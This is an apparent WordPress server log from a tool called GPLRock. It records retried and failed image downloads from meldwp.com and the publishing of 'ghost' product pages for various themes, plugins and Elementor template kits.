Image download failed for product animated-heading-addon-widget-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:25:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/animated-heading-addon--widget-for-elementor-21325.webp for product animated-heading-addon-widget-for-elementor after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 17:25:44 UTC] GPLRock WARNING: Image download failed for product animated-heading-addon-widget-for-elementor. URL: https://meldwp.com/wp-content/uploads/animated-heading-addon--widget-for-elementor-21325.webp [04-Apr-2026 17:25:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: animated-heading-addon-widget-for-elementor [04-Apr-2026 17:25:44 UTC] GPLRock: Image download failed for product animation-css3-effects-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:25:47 UTC] GPLRock: Image download failed for product animation-css3-effects-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:25:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/animation-css3-effects-wordpress-plugin-11721.webp for product animation-css3-effects-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 17:25:49 UTC] GPLRock: Image download failed for product animation-css3-effects-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:25:51 UTC] GPLRock: Image download failed for product animation-css3-effects-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:25:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/animation-css3-effects-wordpress-plugin-11721.webp for product animation-css3-effects-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 17:25:53 UTC] GPLRock WARNING: Image download failed for product animation-css3-effects-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/animation-css3-effects-wordpress-plugin-11721.webp [04-Apr-2026 17:25:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: animation-css3-effects-wordpress-plugin [04-Apr-2026 17:25:53 UTC] GPLRock: Image download failed for product woocommerce-advanced-captcha-google-cloudflare-hcaptcha (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:25:55 UTC] GPLRock: Image download failed for product woocommerce-advanced-captcha-google-cloudflare-hcaptcha (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:25:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-advanced-captcha---google-cloudflare-hcaptcha-33215.webp for product woocommerce-advanced-captcha-google-cloudflare-hcaptcha after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 17:25:58 UTC] GPLRock: Image download failed for product woocommerce-advanced-captcha-google-cloudflare-hcaptcha (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:26:00 UTC] GPLRock: Image download failed for product woocommerce-advanced-captcha-google-cloudflare-hcaptcha (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:26:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-advanced-captcha---google-cloudflare-hcaptcha-33215.webp for product woocommerce-advanced-captcha-google-cloudflare-hcaptcha after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 17:26:02 UTC] GPLRock WARNING: Image download failed for product woocommerce-advanced-captcha-google-cloudflare-hcaptcha. URL: https://meldwp.com/wp-content/uploads/woocommerce-advanced-captcha---google-cloudflare-hcaptcha-33215.webp [04-Apr-2026 17:26:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-advanced-captcha-google-cloudflare-hcaptcha [04-Apr-2026 17:26:02 UTC] GPLRock: Image downloaded successfully for product fh-mega-menu-jquery-bootstrap-3-mega-menu-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-46241107.webp [04-Apr-2026 17:26:02 UTC] GPLRock: Using pre-downloaded image for product fh-mega-menu-jquery-bootstrap-3-mega-menu-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-46241107.webp [04-Apr-2026 17:26:02 UTC] GPLRock: Ghost product published with image - Product ID: fh-mega-menu-jquery-bootstrap-3-mega-menu-plugin [04-Apr-2026 17:38:33 UTC] GPLRock: Image download failed for product bonjour-magazine-and-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:38:35 UTC] GPLRock: Image download failed for product bonjour-magazine-and-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:38:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bonjour---magazine-and-blog-wordpress-theme-9583.webp for product bonjour-magazine-and-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 17:38:37 UTC] GPLRock: Image download failed for product bonjour-magazine-and-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:38:39 UTC] GPLRock: Image download failed for product bonjour-magazine-and-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:38:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bonjour---magazine-and-blog-wordpress-theme-9583.webp for product bonjour-magazine-and-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 17:38:41 UTC] GPLRock WARNING: Image download failed for product bonjour-magazine-and-blog-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/bonjour---magazine-and-blog-wordpress-theme-9583.webp [04-Apr-2026 17:38:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bonjour-magazine-and-blog-wordpress-theme [04-Apr-2026 17:38:42 UTC] GPLRock: Image download failed for product buildgo-construction-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:38:44 UTC] GPLRock: Image download failed for product buildgo-construction-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:38:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/buildgo---construction-wordpress-theme-20493.webp for product buildgo-construction-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 17:38:46 UTC] GPLRock: Image download failed for product buildgo-construction-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:38:48 UTC] GPLRock: Image download failed for product buildgo-construction-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:38:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/buildgo---construction-wordpress-theme-20493.webp for product buildgo-construction-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 17:38:50 UTC] GPLRock WARNING: Image download failed for product buildgo-construction-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/buildgo---construction-wordpress-theme-20493.webp [04-Apr-2026 17:38:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: buildgo-construction-wordpress-theme [04-Apr-2026 17:38:50 UTC] GPLRock: Image download failed for product tikie-book-store-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:38:52 UTC] GPLRock: Image download failed for product tikie-book-store-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:38:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tikie--book-store-woocommerce-wordpress-theme-1798.webp for product tikie-book-store-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 17:38:55 UTC] GPLRock: Image download failed for product tikie-book-store-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:38:57 UTC] GPLRock: Image download failed for product tikie-book-store-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:38:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tikie--book-store-woocommerce-wordpress-theme-1798.webp for product tikie-book-store-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 17:38:59 UTC] GPLRock WARNING: Image download failed for product tikie-book-store-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/tikie--book-store-woocommerce-wordpress-theme-1798.webp [04-Apr-2026 17:38:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tikie-book-store-woocommerce-wordpress-theme [04-Apr-2026 17:38:59 UTC] GPLRock: Image download failed for product car-service-mechanic-auto-repair-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:39:01 UTC] GPLRock: Image download failed for product car-service-mechanic-auto-repair-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:39:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/car-service---mechanic--auto-repair-wordpress-theme-33423.webp for product car-service-mechanic-auto-repair-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 17:39:04 UTC] GPLRock: Image download failed for product car-service-mechanic-auto-repair-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:39:06 UTC] GPLRock: Image download failed for product car-service-mechanic-auto-repair-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:39:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/car-service---mechanic--auto-repair-wordpress-theme-33423.webp for product car-service-mechanic-auto-repair-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 17:39:08 UTC] GPLRock WARNING: Image download failed for product car-service-mechanic-auto-repair-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/car-service---mechanic--auto-repair-wordpress-theme-33423.webp [04-Apr-2026 17:39:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: car-service-mechanic-auto-repair-wordpress-theme [04-Apr-2026 17:39:08 UTC] GPLRock: Image download failed for product moppers-cleaning-company-and-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:39:10 UTC] GPLRock: Image download failed for product moppers-cleaning-company-and-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:39:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/moppers---cleaning-company-and-services-wordpress-theme-14596.webp for product moppers-cleaning-company-and-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 17:39:12 UTC] GPLRock: Image download failed for product moppers-cleaning-company-and-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:39:14 UTC] GPLRock: Image download failed for product moppers-cleaning-company-and-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:39:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/moppers---cleaning-company-and-services-wordpress-theme-14596.webp for product moppers-cleaning-company-and-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 17:39:16 UTC] GPLRock WARNING: Image download failed for product moppers-cleaning-company-and-services-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/moppers---cleaning-company-and-services-wordpress-theme-14596.webp [04-Apr-2026 17:39:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: moppers-cleaning-company-and-services-wordpress-theme [04-Apr-2026 17:39:17 UTC] GPLRock: Image download failed for product turitor-education-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:39:19 UTC] GPLRock: Image download failed for product turitor-education-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:39:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/turitor---education-wordpress-theme-25516.webp for product turitor-education-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 17:39:21 UTC] GPLRock: Image download failed for product turitor-education-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:39:23 UTC] GPLRock: Image download failed for product turitor-education-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:39:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/turitor---education-wordpress-theme-25516.webp for product turitor-education-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 17:39:25 UTC] GPLRock WARNING: Image download failed for product turitor-education-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/turitor---education-wordpress-theme-25516.webp [04-Apr-2026 17:39:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: turitor-education-wordpress-theme [04-Apr-2026 17:39:25 UTC] GPLRock: Image download failed for product alvaro-hobby-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:39:28 UTC] GPLRock: Image download failed for product alvaro-hobby-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:39:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/alvaro--hobby-multipurpose-wordpress-theme-2294.webp for product alvaro-hobby-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 17:39:30 UTC] GPLRock: Image download failed for product alvaro-hobby-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:39:32 UTC] GPLRock: Image download failed for product alvaro-hobby-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:39:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/alvaro--hobby-multipurpose-wordpress-theme-2294.webp for product alvaro-hobby-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 17:39:34 UTC] GPLRock WARNING: Image download failed for product alvaro-hobby-multipurpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/alvaro--hobby-multipurpose-wordpress-theme-2294.webp [04-Apr-2026 17:39:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: alvaro-hobby-multipurpose-wordpress-theme [04-Apr-2026 17:39:34 UTC] GPLRock: Image download failed for product contrast-elite-photography-portfolio-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:39:36 UTC] GPLRock: Image download failed for product contrast-elite-photography-portfolio-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:39:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/contrast---elite-photography--portfolio-theme-26052.webp for product contrast-elite-photography-portfolio-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 17:39:38 UTC] GPLRock: Image download failed for product contrast-elite-photography-portfolio-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:39:41 UTC] GPLRock: Image download failed for product contrast-elite-photography-portfolio-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:39:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/contrast---elite-photography--portfolio-theme-26052.webp for product contrast-elite-photography-portfolio-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 17:39:43 UTC] GPLRock WARNING: Image download failed for product contrast-elite-photography-portfolio-theme. URL: https://meldwp.com/wp-content/uploads/contrast---elite-photography--portfolio-theme-26052.webp [04-Apr-2026 17:39:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: contrast-elite-photography-portfolio-theme [04-Apr-2026 17:39:43 UTC] GPLRock: Image download failed for product sienna-fashion-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:39:45 UTC] GPLRock: Image download failed for product sienna-fashion-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:39:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sienna---fashion-woocommerce-wordpress-theme-10161.webp for product sienna-fashion-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 17:39:47 UTC] GPLRock: Image download failed for product sienna-fashion-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:39:49 UTC] GPLRock: Image download failed for product sienna-fashion-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:39:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sienna---fashion-woocommerce-wordpress-theme-10161.webp for product sienna-fashion-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 17:39:51 UTC] GPLRock WARNING: Image download failed for product sienna-fashion-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/sienna---fashion-woocommerce-wordpress-theme-10161.webp [04-Apr-2026 17:39:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sienna-fashion-woocommerce-wordpress-theme [04-Apr-2026 17:39:51 UTC] GPLRock: Image download failed for product milian-personal-portfolio-online-resume-cv-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:39:54 UTC] GPLRock: Image download failed for product milian-personal-portfolio-online-resume-cv-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:39:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/milian---personal-portfolio--online-resume-cv-wordpress-theme-11419.webp for product milian-personal-portfolio-online-resume-cv-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 17:39:56 UTC] GPLRock: Image download failed for product milian-personal-portfolio-online-resume-cv-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:39:58 UTC] GPLRock: Image download failed for product milian-personal-portfolio-online-resume-cv-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 17:40:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/milian---personal-portfolio--online-resume-cv-wordpress-theme-11419.webp for product milian-personal-portfolio-online-resume-cv-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 17:40:00 UTC] GPLRock WARNING: Image download failed for product milian-personal-portfolio-online-resume-cv-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/milian---personal-portfolio--online-resume-cv-wordpress-theme-11419.webp [04-Apr-2026 17:40:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: milian-personal-portfolio-online-resume-cv-wordpress-theme [04-Apr-2026 17:58:14 UTC] GPLRock: Image downloaded successfully for product criptix-cryptocurrency-blockchain-bitcoin-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-48ff5fe5.webp [04-Apr-2026 17:58:14 UTC] GPLRock: Using pre-downloaded image for product criptix-cryptocurrency-blockchain-bitcoin-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-48ff5fe5.webp [04-Apr-2026 17:58:15 UTC] GPLRock: Ghost product published with image - Product ID: criptix-cryptocurrency-blockchain-bitcoin-elementor-template-kit [04-Apr-2026 17:58:16 UTC] GPLRock: Image downloaded successfully for product criativo-creative-agency-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-903ece85.webp [04-Apr-2026 17:58:16 UTC] GPLRock: Using pre-downloaded image for product criativo-creative-agency-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-903ece85.webp [04-Apr-2026 17:58:16 UTC] GPLRock: Ghost product published with image - Product ID: criativo-creative-agency-portfolio-elementor-template-kit [04-Apr-2026 17:58:17 UTC] GPLRock: Image downloaded successfully for product crespo-fast-food-restaurant-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c8982d18.webp [04-Apr-2026 17:58:17 UTC] GPLRock: Using pre-downloaded image for product crespo-fast-food-restaurant-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c8982d18.webp [04-Apr-2026 17:58:17 UTC] GPLRock: Ghost product published with image - Product ID: crespo-fast-food-restaurant-elementor-template-kit [04-Apr-2026 17:58:18 UTC] GPLRock: Image downloaded successfully for product creava-creative-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-36e719bc.webp [04-Apr-2026 17:58:18 UTC] GPLRock: Using pre-downloaded image for product creava-creative-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-36e719bc.webp [04-Apr-2026 17:58:18 UTC] GPLRock: Ghost product published with image - Product ID: creava-creative-agency-elementor-template-kit [04-Apr-2026 17:58:20 UTC] GPLRock: Image downloaded successfully for product creativolks-creative-business-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3e70ecdb.webp [04-Apr-2026 17:58:20 UTC] GPLRock: Using pre-downloaded image for product creativolks-creative-business-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3e70ecdb.webp [04-Apr-2026 17:58:20 UTC] GPLRock: Ghost product published with image - Product ID: creativolks-creative-business-agency-elementor-template-kit [04-Apr-2026 17:58:21 UTC] GPLRock: Image downloaded successfully for product couples-wedding-planner-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d5a796ba.webp [04-Apr-2026 17:58:21 UTC] GPLRock: Using pre-downloaded image for product couples-wedding-planner-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d5a796ba.webp [04-Apr-2026 17:58:21 UTC] GPLRock: Ghost product published with image - Product ID: couples-wedding-planner-template-kit [04-Apr-2026 17:58:23 UTC] GPLRock: Image downloaded successfully for product counsel-law-firm-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4e939dc8.webp [04-Apr-2026 17:58:23 UTC] GPLRock: Using pre-downloaded image for product counsel-law-firm-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4e939dc8.webp [04-Apr-2026 17:58:23 UTC] GPLRock: Ghost product published with image - Product ID: counsel-law-firm-elementor-template-kit [04-Apr-2026 17:58:24 UTC] GPLRock: Image downloaded successfully for product cospace-coworking-modern-workspace (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2b261080.webp [04-Apr-2026 17:58:24 UTC] GPLRock: Using pre-downloaded image for product cospace-coworking-modern-workspace: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2b261080.webp [04-Apr-2026 17:58:24 UTC] GPLRock: Ghost product published with image - Product ID: cospace-coworking-modern-workspace [04-Apr-2026 17:58:26 UTC] GPLRock: Image downloaded successfully for product corppa-business-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9c4ad9b3.webp [04-Apr-2026 17:58:26 UTC] GPLRock: Using pre-downloaded image for product corppa-business-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9c4ad9b3.webp [04-Apr-2026 17:58:26 UTC] GPLRock: Ghost product published with image - Product ID: corppa-business-portfolio-elementor-template-kit [04-Apr-2026 17:58:27 UTC] GPLRock: Image downloaded successfully for product corpo-corporate-business-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6d34937a.webp [04-Apr-2026 17:58:27 UTC] GPLRock: Using pre-downloaded image for product corpo-corporate-business-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-6d34937a.webp [04-Apr-2026 17:58:27 UTC] GPLRock: Ghost product published with image - Product ID: corpo-corporate-business-elementor-template-kit [04-Apr-2026 18:07:11 UTC] GPLRock: Image downloaded successfully for product unicon-design-driven-multipurpose-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-31ca1c99.jpg [04-Apr-2026 18:07:11 UTC] GPLRock: Using pre-downloaded image for product unicon-design-driven-multipurpose-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-31ca1c99.jpg [04-Apr-2026 18:07:11 UTC] GPLRock: Ghost product published with image - Product ID: unicon-design-driven-multipurpose-theme [04-Apr-2026 18:07:13 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-xero (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8dcd7050.jpg [04-Apr-2026 18:07:13 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-xero: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8dcd7050.jpg [04-Apr-2026 18:07:13 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-xero [04-Apr-2026 18:07:14 UTC] GPLRock: Image downloaded successfully for product mythemeshop-reactor-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-df72dff8.jpg [04-Apr-2026 18:07:14 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-reactor-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-df72dff8.jpg [04-Apr-2026 18:07:14 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-reactor-wordpress-theme [04-Apr-2026 18:07:16 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-slack (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-94c1624c.jpg [04-Apr-2026 18:07:16 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-slack: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-94c1624c.jpg [04-Apr-2026 18:07:16 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-slack [04-Apr-2026 18:07:18 UTC] GPLRock: Image downloaded successfully for product product-options-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dd2eda66.jpg [04-Apr-2026 18:07:18 UTC] GPLRock: Using pre-downloaded image for product product-options-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-dd2eda66.jpg [04-Apr-2026 18:07:18 UTC] GPLRock: Ghost product published with image - Product ID: product-options-for-woocommerce [04-Apr-2026 18:07:20 UTC] GPLRock: Image downloaded successfully for product studiopress-mai-lifestyle-pro-genesis-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5a6390a7.jpg [04-Apr-2026 18:07:20 UTC] GPLRock: Using pre-downloaded image for product studiopress-mai-lifestyle-pro-genesis-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5a6390a7.jpg [04-Apr-2026 18:07:20 UTC] GPLRock: Ghost product published with image - Product ID: studiopress-mai-lifestyle-pro-genesis-wordpress-theme [04-Apr-2026 18:07:21 UTC] GPLRock: Image downloaded successfully for product themify-builder-typewriter-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ebdaec7d.jpg [04-Apr-2026 18:07:21 UTC] GPLRock: Using pre-downloaded image for product themify-builder-typewriter-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ebdaec7d.jpg [04-Apr-2026 18:07:21 UTC] GPLRock: Ghost product published with image - Product ID: themify-builder-typewriter-addon [04-Apr-2026 18:07:23 UTC] GPLRock: Image downloaded successfully for product mythemeshop-wp-subscribe-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7f72ff91.jpg [04-Apr-2026 18:07:23 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-wp-subscribe-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7f72ff91.jpg [04-Apr-2026 18:07:23 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-wp-subscribe-pro [04-Apr-2026 18:07:25 UTC] GPLRock: Image downloaded successfully for product mythemeshop-metro-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ac1c77e9.jpg [04-Apr-2026 18:07:25 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-metro-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ac1c77e9.jpg 